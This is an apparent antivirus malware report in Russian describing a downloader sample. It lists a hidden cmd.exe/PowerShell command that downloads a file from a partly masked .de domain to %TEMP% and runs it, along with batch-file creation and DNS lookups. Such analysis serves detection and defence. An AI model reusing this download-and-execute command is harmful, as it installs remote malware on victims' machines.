Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $ztre как %temp%\zg-a4.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function iwbountaf0([String] $Ztre){(New-Object System.Net.WebClient).DownloadFile($Ztre,''%TEMP%\zg-a4.exe'');Start-Process ''%TEMP%\zg-a4.exe'';}try{iwbountaf0(''...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\rdquseuz.bat
Сетевая активность
Подключается к
- 'tr####ercar24.de':80
TCP
Запросы HTTP GET
- http://tr####ercar24.de/grostor.png
UDP
- DNS ASK tr####ercar24.de
- DNS ASK fi####eforautos.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function iwbountaf0([String] $Ztre){(New-Object System.Net.WebClient).DownloadFile($Ztre,''%TEMP%\zg-a4.exe'');Start-Process ''%TEMP%\zg-a4.exe'';}try{iwbountaf0(''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rdquseuz.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rdquseuz.bat" "
